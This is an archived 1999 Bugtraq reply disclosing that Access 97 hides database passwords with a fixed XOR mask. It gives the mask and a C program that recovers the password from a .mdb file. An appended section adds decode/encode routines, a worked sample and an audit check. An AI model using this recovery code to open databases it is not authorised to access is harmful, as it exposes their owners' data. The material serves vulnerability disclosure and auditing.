[9450] in bugtraq
Re: Microsoft Access 97 Stores Database Password as Plaintext
daemon@ATHENA.MIT.EDU (Jim Paris)
Tue Feb 9 19:07:08 1999
Date: Tue, 9 Feb 1999 17:46:27 -0500
Reply-To: Jim Paris <jim@JTAN.COM>
From: Jim Paris <jim@JTAN.COM>
X-To: milton@ISOMEDIA.COM
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <000d01be53aa$d42df540$dbdc95cf@isomedia.com> from "Stephen M. Milton" at Feb 8, 99 01:34:38 pm
> The following text was posted to USENET, and indexed on a Russian cypherpunk
> site. I found it when I was doing some work with Access 97 databases. I
> think you will agree that this particular "feature" makes the linked
> database password issue moot.
Most definitely!
> > Anyway, Access97 passwords are stored in the 13 bytes from offset
> > 0x42 in a .mdb file. Do a bitwise XOR with 0x86, 0xFB, 0xEC, 0x37,
> > 0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 to recover the
> > plaintext. I think that if the first byte is 0x86, the password is
> > not checked.
Minor correction: the passwords can be a maximum of 14 bytes. The last
XOR value is 0xD8. Here's a quick program to test this lack of
security:
/* snip here */
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    FILE *mdb;
    int i, c;
    /* XOR mask applied to the 14 password bytes stored at offset 0x42 */
    int secret[14] = {
        0x86, 0xFB, 0xEC, 0x37,
        0x5D, 0x44, 0x9C, 0xFA,
        0xC6, 0x5E, 0x28, 0xE6,
        0x13, 0xD8
    };

    if (argc < 2) {
        fprintf(stderr, "usage: %s filename.mdb\n", argv[0]);
        return 1;
    }
    if ((mdb = fopen(argv[1], "rb")) == NULL) {
        fprintf(stderr, "%s: can't open %s\n", argv[0], argv[1]);
        return 1;
    }
    if (fseek(mdb, 0x42, SEEK_SET) != 0) {
        fprintf(stderr, "%s: can't seek to offset 0x42 in %s\n", argv[0], argv[1]);
        fclose(mdb);
        return 1;
    }
    printf("The password is: ");
    for (i = 0; i < 14; i++) {
        c = fgetc(mdb);
        /* stop at end of file or at the NUL that terminates a short password */
        if (c == EOF || (c ^ secret[i]) == 0) break;
        putchar(c ^ secret[i]);
    }
    if (i == 0) printf("(none)");
    putchar('\n');
    fclose(mdb);
    return 0;
}
/* snip here */
-jim
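The program above reads a file; the following added example (mine, not Jim's or Microsoft's code) works on the 14 stored bytes as a buffer so the weakness can be checked without a real .mdb: since XOR with a fixed mask is its own inverse, one routine both reveals a stored password and reproduces exactly what the file stores for a given password, which is why the scheme is obfuscation rather than encryption. The names mdb97_decode, mdb97_encode and mdb97_password_set are mine, the 14-byte mask is the one given in the post, the sample bytes are constructed here for the password "secret", and the assumption that unused bytes are stored as NUL XOR the mask (so an empty password stores the mask itself, first byte 0x86) follows from the "first byte is 0x86" remark above.

```c
#include <stdio.h>
#include <string.h>

#define MDB97_PW_OFFSET 0x42   /* offset of the stored password in the .mdb header */
#define MDB97_PW_LEN    14     /* maximum password length (13 from USENET, 14th byte from Jim) */

/* Fixed XOR mask quoted in the post above */
static const unsigned char MDB97_MASK[MDB97_PW_LEN] = {
    0x86, 0xFB, 0xEC, 0x37, 0x5D, 0x44, 0x9C, 0xFA,
    0xC6, 0x5E, 0x28, 0xE6, 0x13, 0xD8
};

/* Apply the mask. XOR is its own inverse, so this one routine turns stored
 * bytes into the password and the password back into the stored bytes. */
static void mdb97_xor(const unsigned char in[MDB97_PW_LEN],
                      unsigned char out[MDB97_PW_LEN])
{
    for (int i = 0; i < MDB97_PW_LEN; i++)
        out[i] = in[i] ^ MDB97_MASK[i];
}

/* Recover the password from the 14 bytes found at offset 0x42.
 * Returns the length; out receives a NUL-terminated copy (15 bytes needed). */
size_t mdb97_decode(const unsigned char stored[MDB97_PW_LEN],
                    char out[MDB97_PW_LEN + 1])
{
    unsigned char plain[MDB97_PW_LEN];
    size_t n = 0;
    mdb97_xor(stored, plain);
    /* a 14-character password has no terminating NUL, so bound by length too */
    while (n < MDB97_PW_LEN && plain[n] != 0) {
        out[n] = (char)plain[n];
        n++;
    }
    out[n] = '\0';
    return n;
}

/* Produce the 14 bytes a file would carry for this password (assumption:
 * unused positions are NUL before masking, so "" stores the mask itself). */
void mdb97_encode(const char *password, unsigned char stored[MDB97_PW_LEN])
{
    unsigned char plain[MDB97_PW_LEN] = {0};
    size_t len = strlen(password);
    if (len > MDB97_PW_LEN) len = MDB97_PW_LEN;
    memcpy(plain, password, len);
    mdb97_xor(plain, stored);
}

/* Audit check: a first stored byte of 0x86 means no password is set. */
int mdb97_password_set(const unsigned char stored[MDB97_PW_LEN])
{
    return stored[0] != MDB97_MASK[0];
}

/* Constructed sample: the 14 bytes a file with password "secret" would carry. */
static const unsigned char SAMPLE_STORED[MDB97_PW_LEN] = {
    0xF5, 0x9E, 0x8F, 0x45, 0x38, 0x30, 0x9C, 0xFA,
    0xC6, 0x5E, 0x28, 0xE6, 0x13, 0xD8
};

int main(void)
{
    char pw[MDB97_PW_LEN + 1];
    unsigned char stored[MDB97_PW_LEN];
    size_t n = mdb97_decode(SAMPLE_STORED, pw);

    printf("password set: %d, length %zu: \"%s\"\n",
           mdb97_password_set(SAMPLE_STORED), n, pw);
    /* Round trip: masking the recovered password gives back the stored bytes
     * exactly, so anyone holding the mask holds every Access 97 password. */
    mdb97_encode(pw, stored);
    printf("round trip matches stored bytes: %d\n",
           memcmp(stored, SAMPLE_STORED, MDB97_PW_LEN) == 0);
    return 0;
}
```

The useful defensive takeaway is mdb97_password_set: an inventory script can flag files that rely on this password at all, since the value it protects is recoverable by anyone who can read the file, and the real control has to be file-system access to the .mdb rather than the database password.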